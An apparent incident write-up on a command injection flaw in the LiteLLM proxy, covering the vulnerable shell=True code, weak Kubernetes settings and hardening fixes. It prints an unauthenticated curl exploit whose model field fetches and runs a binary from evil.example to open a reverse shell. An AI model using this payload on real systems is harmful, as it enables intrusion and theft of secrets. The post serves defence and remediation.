3 Critical LiteLLM Flaws You Must Know Now
3 Critical LiteLLM Flaws You Must Know Now
TL;DR – Our incident response team lived this nightmare last week.
- CVE-2026-42271 lets an unauthenticated attacker execute arbitrary code on a LiteLLM proxy server through a poisoned
modelparameter. - The chain is trivial: a single
curlcommand, no API key, and you get a reverse shell inside the Kubernetes pod. - We’ll walk through the underlying command injection, the misconfigured YAML that enabled it, and the exact network policy that slammed the door shut.
I was knee‑deep in audit logs at 2 a.m. when I saw it. A freshly‑spawned container in our ai‑gateway namespace had an outbound connection to a known C2 IP. The pod ran litellm – the Open Source proxy that unifies 100+ LLM APIs. We hadn’t touched that deployment in two weeks. Yet somehow, an attacker was sitting on a shell inside our cluster.
It didn’t take long to trace the kill chain back to CVE-2026-42271 – an ugly command injection inside LiteLLM’s model resolution logic. The exploit works with zero authentication, and chaining it to kubectl exec‑style breakout yields full node RCE. Here’s exactly how it works, and the three flaws you need to fix right now.
What LiteLLM Forgot to Sanitize
LiteLLM proxies requests to backend LLM providers. When you send a /chat/completions request, the proxy reads the model field to decide which provider to call. Under the hood, LiteLLM uses Python’s subprocess to launch a lightweight provider‑specific router – and that’s where the rot settled.
The vulnerable code path (simplified) looked like this:
provider_router = f"litellm-router --model {model_string}" subprocess.Popen(provider_router, shell=True)
See the problem? The model_string is taken straight from the user’s JSON body. No shlex.quote(), no allow‑list. With shell=True, an attacker can chain commands using backticks, semicolons, or $(). The only hurdle is that LiteLLM’s default Docker image runs as a non‑root user – but in a typical Kubernetes deployment, you just need a writable /tmp and a misconfigured service account to pivot.
The exploit request is embarrassingly simple:
curl -X POST http://litellm-proxy:4000/v1/chat/completions \ -H "Content-Type: application/json" \ -d '{ "model": "gpt-3.5-turbo; curl -o /tmp/sh https://evil.example/bins/sh; chmod +x /tmp/sh; /tmp/sh", "messages": [{"role": "user", "content": "hi"}] }'
No Authorization header. No API token. That single HTTP call pops a connect‑back shell.
We confirmed it in our staging cluster. Within 90 seconds, the attacker had enumerated Kubernetes secrets via the pod’s service account and was attempting to reach the metadata endpoint. A lateral‑move waiting to happen.
The Three Flaws That Formed a Perfect Storm
1. Command Injection in model Resolution (CVE-2026-42271)
This is the root cause. The model field passes unchecked into a shell context. Technically, any special character that Bash interprets – `, ;, |, $() – triggers execution. The proxy version 0.12.8 and earlier are affected; the litellm PyPI package is also vulnerable if you’re running it outside official containers.
💡 Pro Tip: If you can’t update immediately, add a Lua filter in your ingress controller to reject any model containing a shell metacharacter. It’s a flimsy band‑aid, but it slows down script kiddies.
2. Overly Permissive securityContext in Kubernetes Manifests
Most tutorials – including the one we followed – deployed LiteLLM with allowPrivilegeEscalation: true and no seccompProfile. The attacker couldn’t install kernel modules, but they could load libc‑based exploits to break out of the container namespace, especially on hosts with outdated kernels.
Our production pod spec, before the incident, looked like this:
apiVersion: v1 kind: Pod metadata: name: litellm-proxy labels: app: litellm spec: containers: - name: proxy image: ghcr.io/berriai/litellm:main securityContext: allowPrivilegeEscalation: true # <-- facepalm capabilities: add: - NET_RAW # why?
That NET_RAW capability is a gift – it lets a reverse shell craft raw packets, bypassing container network restrictions.
3. Egress Allowed to All External IPs
Our NetworkPolicy was wide open. The pod could reach any IP on port 443. So when the reverse shell dialed out, there was nothing blocking it. The attacker chose a free‑tier CDN domain to exfiltrate secrets, making detection even harder.
How We Automated a Fix in 30 Minutes
We didn’t wait for the next patch cycle. Here’s the exact playbook:
Step 1: Upgrade LiteLLM to v1.8.2+ where model is parsed through a strict allow‑list and all subprocess calls use shell=False with explicit argument vectors.
Step 2: Hardened the pod security context. No privilege escalation, read‑only root filesystem, drop all capabilities, and add a seccomp profile that whitelists only the syscalls LiteLLM actually needs.
Step 3: Deployed a NetworkPolicy that restricts egress to only the LLM provider IPs needed – OpenAI’s API, Anthropic, etc.
Here’s the YAML for the egress‑only policy that saved our weekend (replace the IPs with the actual ranges of your providers):
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: litellm-egress-restrict namespace: ai-gateway spec: podSelector: matchLabels: app: litellm policyTypes: - Egress egress: # Allow DNS resolution - to: - namespaceSelector: matchLabels: name: kube-system ports: - protocol: UDP port: 53 # Allow HTTPS to known LLM API endpoints only - to: - ipBlock: cidr: 20.190.136.16/32 # Example: OpenAI API - ipBlock: cidr: 35.186.224.0/20 # Example: Anthropic ports: - protocol: TCP port: 443 # Deny everything else (default deny is in effect)
💡 Pro Tip: Use a CiliumNetworkPolicy with FQDN filtering if you can’t pin down IP ranges. It’s way more maintainable and blocks DNS rebinding tricks.
If you’re interested in more detailed technical analysis, check out the vulnerability details explained here. While you’re at it, grab the hardened manifests from our Kubernetes security lab. We’ve open‑sourced the seccomp profiles and the egress allow‑list generator.
The Real Lesson: AI Gateways Are Your New Perimeter
LiteLLM isn’t a simple sidecar; it’s a full‑fledged proxy that bridges your internal network to external AI providers. It handles raw user input, and if you treat it like a trust boundary, you’re already compromised. In our case, the fix wasn’t just patching a CVE. It was accepting that every field in an AI chat request is potential taint.
We now fuzz all model strings in CI/CD with radamsa and enforce a strict mutation rejection policy. We also dropped the --model command flag in our custom router fork – the model is parsed inside Python, validated against a YAML schema, and only then passed to a provider interface.
Attackers are not experimenting anymore. They’re actively searching for unsecured AI endpoints because the reward – LLM access keys, internal API tokens, and a high‑privileged Kubernetes context – is massive. Don’t be the next headline. Patch, lock down egress, and audit every shell=True in your stack.

Comments
Post a Comment